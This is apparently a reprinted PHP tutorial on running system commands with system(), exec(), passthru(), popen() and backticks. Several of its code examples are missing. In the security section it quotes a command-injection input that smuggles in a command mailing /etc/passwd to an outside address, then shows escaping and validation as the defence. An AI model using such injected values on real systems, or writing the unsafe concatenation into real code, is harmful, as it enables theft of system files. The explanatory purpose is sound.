PHP: executing external system commands with system(), exec() and passthru() (PHP tutorial)

Source: Internet
Author: User

Note: You must pay attention to security issues. I will list some related PHP code audits later. The following is the reprinted content.

As a server-side scripting language, PHP is fully capable of tasks ranging from simple scripts to complex dynamic web pages. But this is not always the case. Sometimes, to implement a feature, you must call an external program (or command) of the operating system, which can get the job done with far less effort.

Differences:
system() outputs the command's result and returns its last line.
exec() outputs nothing and returns the last line of the result; all lines of the result can be saved to an array passed as a parameter.
passthru() only calls the command and sends its output directly to the standard output device.
Similarities: all of them can obtain the command's execution status code.
Demo:

// system('dir');
// exec('dir');
// passthru('dir');
// echo `dir`;

Can an external command be called in a PHP script? If so, how is it done? What should you watch out for? You should be able to answer these questions after reading this article.
Is it possible?
The answer is yes. Like other programming languages, PHP can call external commands in a program, and it is very simple: just use one or more functions.
Prerequisites
Since PHP is used mainly for web development, security is an important consideration. For this reason, the PHP designers added a safe mode to PHP. When running in safe mode, a PHP script is subject to restrictions in the following four areas:
Executing external commands
Opening files
Connecting to the MySQL database
HTTP-based authentication
In safe mode, only external programs in a specific directory can be executed, and calls to other programs are rejected. This directory can be specified with the safe_mode_exec_dir directive in the php.ini file, or with the --with-exec-dir option when compiling PHP. The default value is /usr/local/php/bin.
If you call an external command that should produce output (meaning the PHP script itself is correct) but the result is blank, it is very likely that your network administrator is running PHP in safe mode.
How to do it?
You can call external commands in PHP in the following three ways:
1) Use the special functions provided by PHP
PHP provides three specialized functions for executing external commands: system(), exec(), and passthru().
system()
Prototype: string system(string command [, int return_var])
The system() function is similar to its counterpart in other languages: it executes the given command, outputs the result, and returns the last line of it. The second parameter is optional and is used to obtain the status code after the command has run.
Example:

  

exec()
Prototype: string exec(string command [, string array [, int return_var]])
The exec() function is similar to system(). It also executes the given command, but it does not output the result; it returns only the last line of the result. The complete result can still be obtained through the second parameter, array: each line of the result is appended to the end of the array. Therefore, if the array is not empty, we recommend that you clear it with unset() before the call. The third parameter, which receives the command's status code, can only be used when the second parameter is specified.
Example:

  

passthru()
Prototype: void passthru(string command [, int return_var])
passthru() only calls the command and does not return any result; it sends the command's output directly to the standard output device, unchanged. For this reason passthru() is often used to call programs such as pbmplus (a Unix image processing tool that outputs a raw binary image stream). It can also obtain the command's status code.
Example:

  

2) Use the popen() function to open a process
The methods above can only execute commands; they cannot interact with them. Sometimes, however, you must feed input to the command. For example, when adding a Linux system user you must call su to switch the current user to root, and the su command requires the root password to be entered on the command line. In this case the methods above are obviously not feasible.
The popen() function opens a process pipe to execute the given command and returns a file handle. Since a file handle is returned, you can read from it and write to it. In PHP3 the handle supports only a single mode, either write or read. From PHP4, you can read and write the handle at the same time. Whichever mode (read or write) the handle is opened in, you must call the pclose() function to close it.
Example 1:

  

Example 2:

  

3) Use the backtick (`, the key under the ESC key on the keyboard, shared with ~)
This method used to be absent from the PHP documentation and existed as something of a secret. The method is very simple: enclose the command to be executed in two backticks and use it as an expression. The value of this expression is the output of the command. For example:

  

The output of this script is like:
Hunte.gif
Hunte.ppm
Jpg.htm
Jpg.jpg
Passthru.php


What should we consider?
There are two issues to consider: security and timeout.
First, security. Suppose you run a small online store and keep the list of products for sale in a file. You have written an HTML page with a form that lets users enter their e-mail address, and the product list is then sent to them. Assuming you have not used PHP's mail() function (or have never heard of it), you can call the mail program of the Linux/Unix system to send the file. The program looks like this:

  

For ordinary users this code poses no danger, but it actually contains a very serious security vulnerability. Suppose a malicious user enters the following as the e-mail address:
'-- bla; mail someone@domain.com </etc/passwd ;'
Then the command will eventually become:
'mail -- bla; mail someone@domain.com </etc/passwd ; <products.txt'
Any network administrator who sees a command like this will break out in a cold sweat.

Fortunately, PHP provides us with two functions: escapeshellcmd() and escapeshellarg(). The function escapeshellcmd() escapes all the characters in a string that could be used to trick the shell into executing another command. These characters have special meanings in the shell, such as the semicolon (;), redirection (>), and reading from a file (<). The function escapeshellarg() is used to process command parameters. It adds single quotes around the given string and escapes any single quotes inside it, so that the string can be safely used as a command parameter.
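The mail scenario above as an added example, not code from the original article: the vulnerable string concatenation next to a quoted and a validated version. The function names are hypothetical, and the commands are only built and printed, never executed.

```php
<?php
// Added example: commands are only built and printed, never executed.
// products.txt and the mail command come from the scenario in the text.

// Vulnerable pattern: user input concatenated straight into a shell string.
function mail_cmd_unsafe(string $to): string
{
    return "mail $to < products.txt";
}

// Quoting only: shell metacharacters are neutralised, but an argument that
// starts with "-" is still read by the mail program as an option.
function mail_cmd_quoted(string $to): string
{
    return 'mail ' . escapeshellarg($to) . ' < products.txt';
}

// Validate first, then quote. Returns null when the input is rejected.
function mail_cmd_checked(string $to): ?string
{
    $to = trim($to);
    if ($to === '' || $to[0] === '-') {
        return null;                     // would be parsed as an option
    }
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return null;                     // not a syntactically valid address
    }
    return mail_cmd_quoted($to);
}

// Constructed inputs: a normal address and the malicious value from the text.
$inputs = [
    'customer@example.com',
    '-- bla; mail someone@domain.com </etc/passwd ;',
];

foreach ($inputs as $to) {
    echo "input:   $to\n";
    echo "unsafe:  ", mail_cmd_unsafe($to), "\n";
    echo "quoted:  ", mail_cmd_quoted($to), "\n";
    echo "checked: ", mail_cmd_checked($to) ?? '(rejected)', "\n\n";
}
```

For the malicious input, the quoted form keeps the whole string as one argument, so the second mail command never reaches the shell, and the checked form rejects it outright.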


Now for the timeout issue. If the command to be executed takes a long time, it should be run in the background. However, by default, functions such as system() do not return until the command has finished running (in fact, they wait for the command's output), which will certainly cause the PHP script to time out. The solution is to redirect the command's output to another file or stream, for example:

  /tmp/null &"); ?> 
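One way to apply this, as an added example that is not from the original article: a hypothetical helper run_in_background() that quotes its arguments, redirects output, and returns the ID of the background process. It assumes a Unix-like host; the sleep job is constructed sample input.

```php
<?php
// Added example; assumes a Unix-like host. run_in_background() is a
// hypothetical helper, not a PHP built-in.
function run_in_background(string $program, array $args, string $logFile): int
{
    // Quote every piece so no argument can break out of the command line.
    $parts = [escapeshellarg($program)];
    foreach ($args as $arg) {
        $parts[] = escapeshellarg($arg);
    }
    // Redirect stdout and stderr so PHP has nothing to wait for, put the job
    // in the background with "&", and print its process ID with "echo $!".
    $cmd = implode(' ', $parts)
         . ' > ' . escapeshellarg($logFile) . ' 2>&1 & echo $!';

    exec($cmd, $output, $status);
    if ($status !== 0 || !isset($output[0]) || !ctype_digit($output[0])) {
        throw new RuntimeException('could not start background command');
    }
    return (int) $output[0];
}

$start = microtime(true);
$pid = run_in_background('sleep', ['5'], '/dev/null');  // constructed sample job
printf("started PID %d after %.2f s\n", $pid, microtime(true) - $start);
```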
